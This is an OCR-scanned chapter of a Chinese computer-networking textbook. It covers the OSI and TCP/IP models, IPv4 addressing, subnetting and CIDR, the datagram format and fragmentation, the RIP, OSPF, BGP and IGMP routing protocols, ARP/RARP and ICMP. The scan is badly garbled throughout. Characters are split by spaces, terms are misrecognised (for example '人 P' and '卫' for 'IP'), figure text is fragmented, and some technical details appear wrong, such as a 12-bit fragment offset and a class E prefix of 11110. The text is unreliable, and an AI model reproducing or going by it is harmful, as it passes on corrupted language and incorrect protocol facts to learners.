功能 是 用 硬 、 软 件 完 成 的 ， 所 以 这 也 是 一 个 遵循 这 种 体系 结构 的 实现 问题 。 
3.1.1.2” 几 种 典型 的 计算 机 网 络 体 系 结构 

1. OSIUISO 体系 结构 

世界 上 第 一 个 网 络 体系 结构 SNA(System Network Architecture), 是 IBM 公司 于 1974 
年 提出 的 。 凡 是 遵循 SNA 体系 结构 的 设备 都 可 以 很 方便 地 进行 互 连 。 许 多 公司 也 纷纷 
建立 自己 的 网 络 体系 结构 , 如 DEC 公司 提出 的 DNA(Digital Network Architecture) 体 系 结 
构 ， 用 于 本 公司 的 计算 机 组 成 网 络 。 由 于 网 络 体系 结构 不 一 样 ， 一 个 公司 的 计算 机 很 难 
与 另 一 个 公司 的 计算 机 互相 通信 。 于 是 ， 国 际 标准 化 组 织 ISO CIntemational Organization 
for Standardization)， 在 1977 年 就 开始 制定 有 关 异 种 计算 机 网 络 如 何 互 连 的 国际 标准 ， 
并 提出 了 开放 系统 互 连 参 考 模型 (Open System Interconnection Reference), 简称 OSI. 1983 
年 成 为 ISO 7498 国际 标准 。OSIISO 体系 结构 如 图 3-1 所 示 。 
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2. TCP/IP 体系 结构 

1969 年 ， 美 国 国防 部 高 级 研究 计划 局 (Advanced Research Projects Agency, ARPA) 
资助 了 一 个 项 目 ， 该 项 目 通过 使 用 点 到 点 的 租用 线路 建立 一 个 包 交 换 的 计算 机 网 络 ， 这 
个 网 络 被 称 为 ARPAnet， 它 为 早期 网 络 研究 提供 了 一 个 平台 。ARPA 制定 了 一 套 协议 ， 
指明 了 单个 计算 机 如 何 通 过 网 络 进行 通信 ， 其 中 TCP (Transmission Control Protocol) 传 
FEBI HMA IP (nternet Protocol) 网 际 协议 是 其 中 两 个 主要 的 协议 ， 这 大 ,协议 后 来 被 
称 作 TCP/IP 协议 。TCP/IP 体系 结构 如 图 3-2 所 示 。 


应 用 屋 

应 用 层 
会 话 层 
ies 传输 层 
传输 层 
网 络 层 网 际 层 

数据 链 路 层 
网 络 接口 层 
物理 层 
图 3-1 OSIISO 体系 结构 图 3-2 TCP/IP 体系 结构 


3.1.2 Internet 协议 
Internet 协议 的 主要 协议 及 其 层次 关系 如 图 3-3 所 示 。 


应 用 层 HTTP SMTP Irerven 


传输 层 


ARP RAR 


图 3-3 Intemet 协议 及 其 层次 关系 
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3.1.2.1 ”网络 层 协 议 

1. IPv4 协议 

(1) 人 P 地 址 

© 概述 

Intemet 中 有 数 百 万 台 以 上 的 主机 和 路 由 器 ， 卫 地 址 可 以 确切 地 标识 它们 。 一 台 主 
机 至 少 拥有 一 个 IP 地 址 。 任 何 两 台 主 机 的 IP 地 址 不 能 相同 ， 但 是 允许 一 台 主 机 拥有 多 
个 他 地 址 。 如果 一 台 计算 机 虽然 也 连 入 Intemet,， 使 用 Internet 的 某 些 功能 ， 但 它 没 有 自 
己 的 IP 地 址 ， 就 不 能 称 为 主机 。 它 只 能 通过 连接 某 台 具有 P 地 址 的 主机 实现 这 些 功能 
的 ， 因 此 只 能 作为 上 述 主 机 的 仿真 终端 ， 其 作用 如 同 该 主机 的 普通 终端 一 样 ， 而 不 论 其 
自身 的 功能 有 多 强 。 

TP 地 址 的 划分 经 过 了 三 个 阶段 : 分 类 的 全 地址; 子 网 的 划分 ; 无 分 类 编 址 (CIDR)。 

© 分 类 人 Pp 地 址 结构 及 类 别 

IP 地 址 是 由 32 位 二 进 制 数 ， 即 4 个 字 节 组 成 的 ， 它 与 硬件 没有 任何 关系 ， 所 以 也 
称 为 逻辑 地 址 。 它 由 网 络 号 和 主机 号 两 个 字段 组 成 ， 这 样 的 IP 地 址 是 两 级 IP 地 址 ， 如 
3-4 图 所 示 。IP 地 址 的 结构 使 我 们 可 以 在 因特网 上 很 方便 地 进行 寻 址 ， 这 就 是 : 先 按 IP 
地 址 中 的 网 络 号 (NetID) 把 网 络 找到 ， 再 按 主机 号 (Host-ID) 把 主机 找到 。 所 以 IP 地 址 并 
不 只 是 一 个 计算 机 的 代号 ， 而 是 指出 了 连接 到 某 网 络 上 的 某 计算 机 。 

比特 31 0 


网 络 号 (Net-ID) 主机 号 (Host-ID) 


图 3-4 也 地 址 结构 


为 了 便于 对 IP 地 址 进行 管理 ， 同 时 还 考虑 到 网 络 的 差异 很 大 , 有 的 网 络 拥有 很 多 主 
机 ， 而 有 的 网 络 上 的 主机 则 很 少 ， 因 此 把 因特网 的 IP 地 址 分 成 为 五 类 ， 即 A HH) EK, 
如 图 3-5 所 示 。 目 前 大 量 使 用 的 IP 地 址 是 A、B、C 三 类 。 当 某 单位 申请 到 一 个 人 P 地 址 
时 ， 实 际 上 只 是 获得 了 一 个 网 络 号 Net-ID， 具 体 的 各 个 主机 号 由 本 单位 自行 分 配 。 

© 特殊 下 地 址 

IP 定义 了 一 套 特 殊 地 址 格式 ， 称 为 保留 地 址 。 这 些 特殊 地 址 包括 : 网 络 地 址 ， 主 机 
地 址 ， 直 接 广播 地 址 ， 有 限 广 播 地 址 ， 本 机 地 址 。 

(2) 子 网 及 子 网 掩 码 

两 级 IP 地 址 的 缺点 : 

。 IP 地 址 空间 的 利用 率 有 时 很 低 。 

。 给 每 一 个 物理 网 络 分 配 一 个 网 络 号 会 使 路 由 表 变 得 太 大 因而 使 网 络 性 能 变 坏 。 

© 划分 子 网 


a 项 
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比特 31 23 15 F 0 

A 类 | 0 NetID Host-ID 

B 类 | 10 Net-ID | Host-ID 

c% | 110 Net-ID Host-ID 

D# | 1110 组 播 地 址 

E 类 | 11110 保留 为 以 后 使 用 
图 3-5 了 P 地 址 的 类 型 

在 他 地 址 中 增加 一 个 “subnet-id” 字 段 ， 使 两 级 的 他 地址 变 成 为 三 级 的 下 地址 。 


这 种 做 法 叫做 划分 子 网 (subnetting)。 划 分 子 网 纯 属 一 个 单位 内 部 的 事情 。 单 位 对 外 仍然 
表现 为 没有 划分 子 网 的 网 络 。 因 此 子 网 号 Subnet-ID 是 从 两 级 人 P 的 主机 号 部 分 “借用 ” 
的 若干 位 。 

当 外 面 的 分 组 进入 到 本 单位 网 络 后 ， 本 单位 的 路 由 器 如 何 确定 应 转发 的 子 网 呢 ? 这 
就 是 子 网 掩 码 的 作用 。 将 子 网 掩 码 和 IP 地 址 进行 逐 位 相 “ 与 ” 所 得 的 结果 就 是 网 络 地 


址 。 这 里 的 网 络 地 址 显然 是 Net-ID 部 分 和 Subnet-ID 部 分 不 变 ， 而 Host-ID 部 分 为 全 0。 
三 级 全 地 址 结构 及 子 网 掩 码 如 图 3-6 所 示 。 
比特 31 0 
Net -ID Subnet-ID | Host-ID | 
子 网 掩 码 下 000000000 
图 3-6 三 级 人 P 地 址 的 结构 及 子 网 掩 码 


(3) VLSM 和 CIDR 

1992 年 因特网 面临 三 个 必须 尽早 解决 的 问题 ， 这 就 是 : 

° B 类 地 址 在 1992 年 已 分 配 了 近 一 半 ， 将 于 1994 年 3 月 全 部 分 配 完毕 ! 

。 因特网 主干 网 上 的 路 由 表 中 的 项 目 数 急剧 增长 (从 几 千 个 增长 到 几 万 个 )。 

。 整个 IPv4 的 地 址 空间 最 终 将 全 部 耗 尽 。 

1987 年 , RFC 1009 指明 在 一 个 划分 子 网 的 网 络 中 可 同时 使 用 几 个 不 同 的 子 网 掩 码 。 
使 用 变 长 子 网 掩 码 VLSM (Variable Length Subnet Mask) 可 进一步 提高 IP 地 址 资源 的 利 


用 率 。 
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在 VLSM 的 基础 上 又 进一步 研究 出 无 分 类 编 址 方法 , 正式 名 字 是 无 分 类 域 间 路 由 选 
择 CIDR (Classless Inter-Domain Routing)。 
CIDR 两 级 编 址 的 记 法 如 图 3-7 所 示 。 
比特 31 


IP 地 址 


Network - prefix Host-ID 


图 3-7 CIDR 两 级 编 址 结 


CIDR 常 采用 如 123.11.48.0/20 的 表示 方法 ， 即 在 IP 地 址 后 面 加 上 一 个 斜 线 “/”， 
然后 在 “/” 下 方 写 上 网 络 前 缀 所 占 的 比特 数 。 网 络 前 级 所 占 的 比特 数 隐 含 地 指出 卫 地 
HE 123.11.48.0 的 掩 码 是 255.255.240.0。CIDR 虽然 不 使 用 子 网 了 ， 但 仍然 使 用 “ 掩 码 ” 
这 一 名 词 〈 但 不 叫 子 网 掩 码 )。 

CIDR 将 网 络 前 级 都 相同 的 连续 的 TP 地 址 组 成 “CIDR 地 址 块 ”， 即 一 个 CIDR 地 
址 块 可 以 表示 很 多 地 址 ， 这 种 地 址 的 聚合 常 称 为 路 由 聚合 ， 它 使 得 路 由 表 中 的 项 目 大 大 


另外 也 地 址 还 分 为 全 球 地 址 和 专用 地 址 。【RFC 1918】 指 明 的 专用 地 址 是 : 
10.0.0.0 到 10.255.255.255 (或 记 为 10/8); 

172.16.0.0 到 172.31.255.255 (或 记 为 172.16/12) 

192.168.0.0 到 192.168.255.255 (或 记 为 192.168/16) 

(4) IPv4 数据 报 格 式 

IPv4 的 数据 报 格 式 如 图 3-8 所 示 。 其 中 : 


总 长 度 


服务 类 型 


E 志 K 偏 移 


生存 时 间 


协 议 | 首部 检验 和 


源 地 址 


目 的 地 址 


可 选 字 段 (长 度 可 变 ) 填充 


数 据 部 分 


图 3-8 JIPv4 数据 报 格式 
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。 版 本 : 4bit， 指 他 协议 的 版 本 ， 如 : 下 协议 版 本 号 为 4( 即 IPv4)。 

。 首部 长 度 : 4bit， 可 表示 的 最 大 数值 是 15 个 单位 (一 个 单位 为 4 字 节 )， 因 此 了 他 
的 首部 长 度 的 最 大 值 是 60 字 节 。 

。 服务 类 型 : 8bit， 用 来 获得 更 好 的 服务 ， 包 括 时 延 、 吞 吐 量 、 可 靠 性 、 路 由 费用 
等 5 

。 总 长 度 : 16 bit， 指 首部 和 数据 之 和 的 长 度 ， 单 位 为 字 节 ， 因 此 数据 报 的 最 大 长 度 

为 65535 字 节 。 总 长 度 必须 不 超过 最 大 传送 单元 MTU (Maximum Transmission 

Unit). 

标识 : 16 bit， 为 了 使 分 片 后 的 各 数据 报 片 最 后 能 准确 地 重 装 成 为 原来 的 数据 报 。 

标志 : 3 bit， 目 前 只 有 前 两 个 比特 有 意义 。 

。 片 偏 移 : 12 bit， 表 示 较 长 的 分 组 在 分 片 后 ， 某 片 在 原 分 组 中 的 相对 位 置 。 片 偏 移 


以 8 个 字 节 为 偏 移 单位 。 
。 生存 时 间 : 8 bit， 记 为 TTL〈Time To Live)， 数 据 报 在 网 络 中 可 通过 的 路 由 器 数 
的 最 大 值 。 


协议 : 8bit， 指 出 此 数据 报 携带 的 数据 使 用 何 种 协议 ， 以 便 目 的 主机 的 IP 层 将 数 
据 部 分 上 交 给 哪个 处 理 过 程 。 
。 首部 检验 和 : 16bit。 只 检验 数据 报 的 首部 不 包括 数据 部 分 。 这 里 不 采用 CRC 
(Cyclical Redundancy Check， 循 环 元 余 码 校 验 ) 检验 码 而 采用 简单 的 计算 方法 。 

。 源 地 址 : 4 字 节 。 
。 目的 地 址 : 4 字 节 。 
可 选 字段 : 用 来 增加 IP 数据 报 的 功能 。 
填充 ， 能 够 填充 32 位 。 

。 数据 部 分 : 使 用 IP 数据 报 所 传输 的 内 容 和 协议 字段 有 很 大 的 关系 。 假 如 协议 字 

段 指明 是 TCP 协议 ， 那 么 数据 部 分 就 是 一 个 TCP HRC. (AMR IP at Tait 
不 是 一 个 完整 的 TCP 报 文 了 。 

(5) IP 数据 报 的 封装 与 分 片 

IP 数据 报 处 于 网 络 层 ， 在 传送 时 它 需 要 下 层 协 议 给 它 提 供 服务 ， 把 它 封 装 在 数据 链 
路 层 的 协议 数据 单元 一 一 帧 的 数据 域 中 。 而 数据 帧 的 格式 和 其 数据 域 大 小 的 定义 和 上 层 
协议 是 独立 的 ， 它 不 会 事先 去 考虑 上 层 的 协议 数据 单元 的 大 小 。 所 以 如 果 下 层 帧 的 数据 
域 小 于 卫 数据 报 大 小 的 话 ，P 数据 报 必须 分 片 。 如 果 IP 数据 报 传送 时 进行 了 分 片 ， 人 P 
首部 的 “总 长 度 ” 字 段 不 是 指 未 分 片 前 的 数据 报 长 度 ， 而 是 指 分 片 后 每 片 的 首部 长 度 与 
数据 长 度 的 总 和 。 

也 就 是 说 IP 数据 报 的 长 度 一 定 不 能 超过 数据 链 路 层 的 最 大 传送 单元 MTU， 即 下 层 
帧 的 数据 域 的 大 小 。 通 常 以 太 网 的 MTU 为 1500B，PPP (Point to Point Protocol， 点 对 点 
协议 ) 的 MTU 为 296B，FDDI (Fiber Distributing Data Interface， 光 纤 分 布 式 数据 接口 ) 
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的 MTU 为 4352B， 令 牌 环 的 MTU 为 4464B。 图 3-9 的 (a) Cb) 说 明了 了 P 的 封装 与 分 片 。 


IP 首 部 数据 域 


== IP 数据 报 _ 


帧 首部 数据 域 帧 尾部 


Ca) IP 数据 报 的 长 度 不 大 于 帧 的 数据 域 时 的 封装 


IP 首 部 2 数据 域 


1409 


1410 2840 


帧 首部 数据 域 帧 尾部 


帧 首部 数据 域 帧 尾部 


(b》IP 数 据 报 的 长 度 大 于 帧 的 数据 域 时 的 分 片 与 封装 
图 3-9 TJ 数据 报 的 分 片 与 封装 


2. Internet 路 由 协议 

众所周知 ，Intemet 是 由 多 个 网 络 互联 在 一 起 的 网 络 ， 当 数据 包 在 这 样 一 个 复杂 的 网 
络 上 传输 时 ,会 遇 到 很 多 “十 字 路 口 ” 到 底 该 向 那 条 路 由 上 走 ， 必 须 有 一 个 类 似 “ 交 警 ” 
的 部 件 来 完成 这 一 功能 。 在 Intemet 上 这 一 部 件 就 是 路 由 器 。 而 路 由 器 又 是 依靠 运行 路 
由 协议 来 完成 其 功能 的 。 换 名 话说 ， 路 由 器 上 的 路 由 表 是 根据 路 由 协议 生成 的 。 路 由 协 
议 的 核心 就 是 路 由 算法 。 

由 于 Internet 规模 太 大 ， 所 以 常 把 它 划 分 成 许多 较 小 的 自治 系统 (Autonomous 
System，AS)。 通 常 把 自治 系统 内 部 的 路 由 协议 称 为 内 部 网 关 协 议 ， 自 治 系统 之 间 的 协 
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议 称 为 外 部 网 关 协 议 。 常 见 的 内 部 网 关 协 议 有 RIP 协议 和 OSPF 协议 ， 外 部 网 关 协 议 有 
BGP 协议 。 

(1) 路 由 信息 协议 RIP (Routing Information Protocol) 

RIP 是 一 种 分 布 式 的 基于 距离 向 量 的 路 由 选择 协议 ， 它 位 于 应 用 层 ， 考 虑 到 和 上 下 
协议 的 相关 性 放 在 这 里 进行 讨论 。 该 协议 所 定义 的 距离 就 是 经 过 的 路 由 器 的 数目 ， 距 离 
最 短 的 路 由 就 是 最 好 的 路 由 。 它 允许 一 条 路 径 最 多 只 能 包含 15 个 路 由 器 (限制 了 网 络 的 
规模 )。 距 离 为 16 表示 不 可 达 。 所 以 RIP 不 能 在 两 个 网 络 之 间 同 时 使 用 多 条 路 由 来 进行 
负载 均衡 。 

RIP 协议 要 求 网 络 中 的 每 一 个 路 由 器 都 要 维护 从 它 自 己 到 其 他 每 一 个 目的 网 络 的 距 
离 记 录 ， 并 以 此 来 形成 自己 的 路 由 表 。 且 按 固 定时 间 〈 一 般 为 30 秒 ) 和 相 邻 路 由 器 交换 
路 由 表 。 

RP 协议 属于 应 用 层 协议 ， 它 使 用 运输 层 的 用 户 数据 报 UDP (User Datagram 
Protocol) 进行 传送 。RIP 协议 的 格式 如 图 3-10 所 示 。 

RIP 协议 中 的 命令 字段 指出 报 文 的 意义 。 地 址 类 别 字 段 指出 所 使 用 的 地 址 协议 ， 当 
AEH IP 地 址 时 ， 该 字段 的 值 为 2。 路 由 标记 字段 应 该 写 入 自治 系统 号 。 一 个 RIP 报 文 最 
大 长 度 为 504 字 节 ， 这 是 因为 一 个 RIP 报 文 的 路 由 部 分 最 多 可 包含 25 个 路 由 信息 。 当 
超过 504 字 节 的 最 大 长 度 时 ， 就 应 该 再 用 一 个 RIP 报 文 来 传送 。 

RIP 协议 使 用 的 距离 向 量 算法 如 下 : 

当 一 个 路 由 器 《其 地 址 为 和 ) 收 到 相 邻 路 由 器 〈 其 地 址 为 Y) 的 一 个 RIP 报 文 后 ， 
所 做 处 理 如 下 : 

© 先 修改 此 RIP 报 文中 的 所 有 项 目 : 将 “下 一 跳 ” 字 段 中 的 地 址 都 改 为 Y， 并 将 
所 有 的 “距离 ”字段 的 值 加 1。 

@ 对 修改 后 的 RIP 报 文中 的 每 一 个 项 目 ， 重 复 以 下 步骤 : 

若 项 目 中 的 目的 网 络 不 在 路 由 表 中 ， 则 将 该 项 目 加 到 路 由 表 中 。 

否则 ， 若 下 一 跳 字段 给 出 的 路 由 器 地 址 是 同样 的 ， 则 将 收 到 的 项 目 蔡 换 原 路 由 表 中 
的 项 目 。 

否则 ， 若 收 到 项 目 中 的 距离 小 于 路 由 表 中 的 距离 ， 则 进行 更 新 ， 

否则 ， 什 么 也 不 做 。 

© E3 分 钟 还 没有 收 到 相 邻 路 由 器 的 更 新 路 由 表 ， 则 将 此 相 邻 路 由 器 记 为 不 可 达 的 路 
由 器 ， 即 将 距离 置 为 16。 

@ 返回 。 

RIP 的 特点 是 :“ 好 消息 传播 得 快 ， 坏 消息 传播 得 慢 ”。 它 的 意思 是 如 果 路 由 器 发 现 
了 一 个 更 短 的 路 由 ， 这 个 消息 可 以 很 快 得 以 传播 ; 但 如 果 网 络 出 现 了 故障 ， 这 样 的 消息 
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会 传播 的 很 慢 。 
网 络 地 址 
子 网 掩 码 
Ls IFT A 下 一 跳 路 由 器 地 址 


距离 ( 1-16) 
RIP 首部 路 由 部 分 
e RIP 报 文 =| 
UDP 首部 
"~ UDP 用 户 数据 报 = 


一 IP 数据 报 a 
图 3-10 RIP 协议 的 格式 及 它 和 UDP、 了 P 协议 的 关系 


(2) 开放 最 短路 径 优 先 协 议 OSPF (Open Shortest Path First) 

OSPF 协议 是 分 布 式 的 链 路 状态 路 由 协议 。 链 路 在 这 里 代表 该 路 由 器 和 哪些 路 由 器 
是 相 邻 的 , 即 通过 一 个 网 络 是 可 以 连通 的 。 链 路 状态 说 明了 该 通路 的 连通 状态 以 及 距离 、 
时 延 、 带 宽 等 参数 。 在 该 协议 中 ， 只 有 当 链 路 状态 发 生变 化 时 ， 路 由 器 才 用 洪 泛 法 向 所 
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有 路 由 器 发 送 路 由 信息 。 所 发 送 的 信息 是 与 本 路 由 器 相 邻 的 所 有 路 由 器 的 链 路 状态 。 为 
了 保存 这 些 链 路 状态 信息 ， 每 个 路 由 器 都 建立 有 一 个 链 路 状态 数据 库 ， 因 为 路 由 器 交换 
信息 时 使 用 的 是 洪 泛 法 ， 所 以 每 个 路 由 器 都 存 有 全 网 的 链 路 状态 信息 ， 也 就 是 说 每 个 路 
由 器 都 知道 整个 网 络 的 连通 情况 和 拓扑 结构 。 这 样 每 个 路 由 器 都 可 以 根据 链 路 状态 数据 
库 的 信息 来 构造 自己 的 路 由 表 。 

为 了 及 时 了 解 链 路 的 状态 情况 , 每 个 路 由 器 需要 定期 (10s) 向 邻居 路 由 器 发 送 Hello 
分 组 。 如 果 40s 都 还 没有 收 到 邻居 的 Hello 信息 ， 则 认为 该 邻居 是 不 连通 的 ， 应 该 立即 
修改 链 路 状态 数据 库 中 所 对 应 的 记录 ， 并 要 重新 计算 路 由 表 。 

除了 Hello 问候 分 组 外 ，OSPF 协议 还 有 四 种 分 组 : 链 路 状态 更 新 分 组 、 链 路 状态 确 
认 分 组 、 数 据 库 描述 分 组 和 链 路 状态 请 求 分 组 。 通 过 这 四 种 分 组 达到 全 网 链 路 数据 库 的 
同步 。 链 路 状态 更 新 分 组 是 正常 情况 下 ， 当 链 路 状态 发 生变 化 时 使 用 洪 泛 法 所 发 送 的 分 
组 ; 链 路 状态 确认 分 组 是 对 链 路 状态 更 新 分 组 的 确认 ; 链 路 状态 描述 分 组 是 当 路 由 器 启 
动 一 条 新 的 通路 时 ， 向 邻居 路 由 器 所 发 送 的 分 组 ; 链 路 状态 请 求 分 组 是 在 与 邻居 路 由 器 
交换 了 数据 库 描述 分 组 后 ， 还 需要 其 他 自己 缺少 的 路 由 信息 时 所 使 用 的 分 组 。 

OSPF 协议 格式 如 图 3-11 所 示 。 
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分 组 长 度 


鉴别 类 型 


H OSPF 分 组 一 | 
IP 数据 报 OSPF 分 组 


m IP 数据 报 =i 


图 3-11 OSPF 协议 的 格式 及 它 与 卫 协议 的 关系 
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OSPF 协议 使 用 洪 泛 法 向 网 络 中 所 有 路 由 器 发 送 链 路 状态 信息 为 了 减 小 洪 泛 范 
围 ，OSPF 协议 对 网 络 进行 了 区 域 划分 。 这 在 OSPF 协议 首部 的 区 域 标识 符 字段 体现 了 
出 来 。 
(3) 外 部 网 关 协 议 BGP (Border Gateway Protocol) 
BGP 是 不 同 自治 系统 的 路 由 器 之 间 交 换 路 由 信息 的 协议 。 由 于 Intemet 的 规模 太 大 , 使 
得 自治 系统 之 间 路 由 选择 非常 困难 。 另 外 ， 对 于 自治 系统 之 间 的 路 由 选择 ， 要 寻找 最 佳 
路 由 是 不 现实 的 。 因 此 ，BGP 只 是 尽力 寻找 一 条 能 够 到 达 目 的 网 络 的 比较 好 的 路 由 。 
每 一 个 自治 系统 的 管理 员 要 选择 至 少 一 个 路 由 器 作为 该 自治 系统 的 “BGP 发 言 人 ”。 
BGP 发 言 人 往往 就 是 BGP 边界 路 由 器 ， 但 也 可 以 不 是 。 通常 ， 两 个 BGP 发 言 人 都 是 通 
过 一 个 共享 网 络 连接 在 一 起 的 。 当 一 个 BGP 发 言 人 与 其 他 自治 系统 中 的 BGP 发 言 人 交 
换 路 由 信息 时 ， 首 先 要 建立 TCP 连接 ,然后 在 此 连接 上 交换 BGP 报 文 以 建立 BGP 会 话 
(session)， 利 用 BGP 会 话 交换 路 由 信息 。 在 BGP 刚刚 运行 时 ，BGP 的 邻 站 是 交换 整个 
的 BGP 路 由 表 。 但 以 后 只 需要 在 发 生变 化 时 更 新 有 变化 的 部 分 。 这 样 做 对 节省 网 络 带 
宽 和 减少 路 由 器 的 处 理 开销 方面 都 有 好 处 。 
BGP 发 言 人 互相 交换 网 络 可 达 性 的 信息 后 , 各 BGP 发 言 人 就 可 找 出 到 达 各 自治 系 
统 的 比较 好 的 路 由 。 
BGP-4 共 使 用 四 种 报 文 : 
© 打开 (Open) 报 文 ， 用 来 与 相 邻 的 另 一 个 BGP 发 言 人 建立 关系 。 
。 更 新 (Update) 报 文 ， 用 来 发 送 某 一 路 由 的 信息 ， 以 及 列 出 要 撤销 的 多 条 路 由 。 
© 保 活 (Keepalive) 报 文 ， 用 来 确认 打开 报 文 和 周期 性 地 证 实 邻 站 关系 。 
。 通知 (Notification) 报 文 ， 用 来 发 送 检测 到 的 差错 。 
BGP 协议 的 格式 及 它 与 TCP Al IP 协议 的 关系 如 图 3-12 所 示 。 
(4) 因特网 组 管理 协议 (Intemet Group Management Protocol, IGMP) 
IGMP 是 在 多 播 环境 下 使 用 的 协议 。IGMP 使 用 IP 数据 报 传递 其 报 文 ， 同 时 它 也 
向 卫 提供 服务 。 
IGMP 可 分 为 以 下 两 个 阶段 : 
。 第 一 阶段 ， 当 某 个 主机 加 入 新 的 多 播 组 时 ， 该 主机 应 向 多 播 组 的 多 播 地 址 发 送 
IGMP 报 文 ， 声 明 自 己 要 成 为 该 组 的 成 员 。 本 地 的 多 播 路 由 器 收 到 IGMP 报 文 
后 ， 将 组 成 员 关 系 转发 给 因特网 上 的 其 他 多 播 路 由 器 。 
。 第 二 阶段 ， 因 为 组 成 员 关 系 是 动态 的 ， 因 此 本 地 多 播 路 由 器 要 周期 性 地 探 询 本 地 
局 域 网 上 的 主机 ， 以 便 知 道 这 些 主机 是 否 还 继续 是 组 的 成 员 。 只 要 对 某 个 组 有 一 
个 主机 响应 ， 那 么 多 播 路 由 器 就 认为 这 个 组 是 活跃 的 。 但 一 个 组 在 经 过 几 次 的 探 
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询 后 仍然 没有 一 个 主机 响应 ， 则 不 再 将 该 组 的 成 员 关 系 转发 给 其 他 的 多 播 路 


由 器 。 
字 节 16 2 1 
标记 | 长 度 | 类 型 | 
= BGP 报 文 一 | 
TCP 首部 BGP 报 文 
TCP 报 文 | 
IP 首部 数据 部 分 
1P 数据 报 一 | 


ree 


图 3-12 BGP 协议 的 格式 及 它 与 TCP 和 了 下 协议 的 关系 
IGMP 协议 格式 及 它 与 人 P 协议 的 关系 如 图 3-13 所 示 。 
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响应 


弄 
= 时 间 


校 验 和 组 地 址 (询问 时 为 0) 


图 3-13 IGMP 协议 的 格式 及 它 与 P 协议 的 关系 


3. 地 址 解析 协议 ARP (Address Resolution Protocol) 与 反 向 地 址 解析 协议 RARP 


(Reverse Address Resolution Protocol) 
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网 络 中 的 一 个 机 器 具有 轴 辑 地 址 和 物理 地 址 两 种 地 址 。 膛 辑 地 址 是 为 了 管理 方便 而 
设置 的 ， 就 像 一 个 学 生 的 学 号 ， 在 小 学 有 一 个 学 号 ， 在 初中 、 高 中 和 大 学 也 各 有 不 同 的 
学 号 。 而 物理 地 址 就 像 一 个 人 的 姓名 是 与 生 俱 来 的 ， 对 一 个 机 器 来 说 ， 网 卡 地 址 就 是 它 
的 物理 地 址 。 如 果 一 个 机 器 不 更 换 网 卡 它 的 物理 地 址 就 不 会 发 生 改 变 。 逻 辑 地 址 是 网 络 
层 的 协议 数据 单元 使 用 的 地 址 ， 物 理 地 址 是 数据 链 路 层 的 协议 数据 单元 MAC (Media 
Access Control) 帧 使 用 的 地 址 。 

(1) ARP 协议 

在 通常 情况 下 ， 当 我 们 访问 一 个 机 器 的 时 候 一 定 可 以 知道 它 的 逻辑 地 址 ， 而 物理 地 
址 就 不 一 定 知道 。 如 果 不 知道 物理 地 址 那么 就 不 能 把 网 络 层 的 数据 包 封 装 成 MACH, 
完 不 成 通信 。ARP 协议 正 是 为 了 解决 这 个 问题 而 设置 的 。 

在 每 台 主 机 上 ，ARP 协议 都 设置 有 一 个 IP 地 址 和 硬件 地 址 对 应 关系 的 高 速 缓存 。 
当 网 络 层 的 数据 报 要 封装 成 MAC 帧 时 ， 首 先 在 高 速 缓存 中 查看 有 无 该 数据 报 首部 的 目 
的 地 址 所 对 应 的 硬件 地 址 ， 若 有 ， 则 将 该 硬件 地 址 写 入 MAC 帧 的 目的 地 址 中 ， 完 成 数 
据 报 的 封装 。 若 无 ，ARP 协议 则 在 本 局 域 网 上 广播 发 出 一 个 ARP 请 求 分 组 ， 格 式 如 图 
3-12 所 示 。 在 ARP 请 求 分 组 中 ， 发 送 方 的 IP 地 址 和 发 送 方 硬件 地 址 ， 以 及 日 标 下 地址 
都 是 应 该 写 入 已 知 的 数据 ， 要 寻找 的 目标 硬件 地 址 写 入 全 0。 当 该 请 求 分 组 到 达 每 一 个 
机 器 上 时 ， 每 一 台 机 器 都 要 拿 自己 的 IP 地 址 和 请 求 分 组 中 的 目标 IP 地 址 进行 比较 ， 如 
果 不 同 则 不 做 任何 动作 ， 若 相同 则 发 送 一 个 ARP 相应 分 组 给 请 求 方 。ARP 相应 分 组 的 
格式 同样 还 是 和 图 3-12 一 样 。 在 相应 分 组 中 发 送 方 写 明 了 自己 的 硬件 地 址 。 当 这 一 通信 
过 程 完成 时 ， 通 信 双 方 都 要 对 自己 的 ARP 高 速 缓存 进行 修改 ， 添 加 上 一 条 记录 。 

ARP 协议 的 数据 格式 如 图 3-14 所 示 。 
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硬件 类 型 协议 类 型 


硬件 地 址 长 度 协议 长 度 操作 


发 送 方 MAC 地 址 ( 八 位 组 0-3) 


发 送 方 MAC 地 址 ( 八 位 组 4-5) 发 送 方 IP 地 址 ( 八 位 组 0-1) 


发 送 方 IP 地 址 ( 八 位 组 2-3) 目标 MAC 地 址 ( 八 位 组 0-1) 


目标 MAC 地 址 ( 八 位 组 2-5) 


目标 IP 地 址 (8 位 组 0-3) 


图 3-14 ARP 协议 的 格式 
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。 人 硬件 类 型 ， 占 2 个 字 节 ， 发 送 方 想 知 道 的 硬件 接口 类 型 ， 以 太 网 的 值 为 1。 

。 协议 类 型 : 占 2 个 字 节 ， 发 送 方 提供 的 高 层 协议 ， 卫 协议 为 0800。 

。 操作 : 占 2 个 字 节 ，ARP 请 求 (1)，ARP 响应 (2)，RARP 请 求 (3)，RARP 响应 (4)。 

。 协议 长 度 : 占 1 个 字 节 ， 高 层 协议 地 址 长 度 。 

。 发 送 方 MAC 地 址 : 占 6 个 字 节 ， 发 送 方 硬 件 地 址 。 

。 目标 MAC 地 址 : 占 6 个 字 节 ， 接 收 方 硬件 地 址 。 

。 硬件 地 址 长 度 : 占 1 个 字 节 ， 常 用 值 为 6。 

(2) RARP 协议 

RARP 协议 往往 用 于 无 盘 工 作 站 环境 。 因 为 主机 没有 外 存 ， 本 地 不 能 存放 IP 地 址 ， 
所 以 需要 一 个 RARP 服务 器 来 存放 IP 地 址 和 硬件 地 址 的 对 应 关系 。 当 一 台 主 机 想 要 上 
Intemet 网 时 ， 它 需要 用 自己 网 卡 上 的 硬件 地 址 到 RARP 服务 器 上 取 回 自己 的 卫 地 址 。 
RARP 协议 的 格式 和 ARP 协议 的 格式 一 样 。 

4. Internet 控制 报 文 协议 ICMP (Internet Control Message Protocol) 

ICMP 协议 允许 路 由 器 报告 差错 情况 和 提供 有 关 异 常情 况 的 报告 。 当 数据 报 不 能 正 
确 到 达 目 的 站 点 ， 或 者 当 路 由 器 没有 足够 的 缓存 空间 ， 又 或 者 当 路 由 器 能 够 向 主机 提供 
更 短 的 路 由 时 ，ICMP 协议 会 及 时 将 这 些 信息 发 送出 去 。 就 像 网 上 的 “交通 警察 ”及 时 
解决 交通 中 的 问题 和 “事故 ”， 保 证 交通 快速 、 顺 畅 一 样 。 

ICMP 报 文 有 ICMP 差错 报 文 和 ICMP 询问 报 文 两 种 。 

ICMP 报 文 格式 及 它 与 P 的 关系 如 图 3-15 所 示 。 
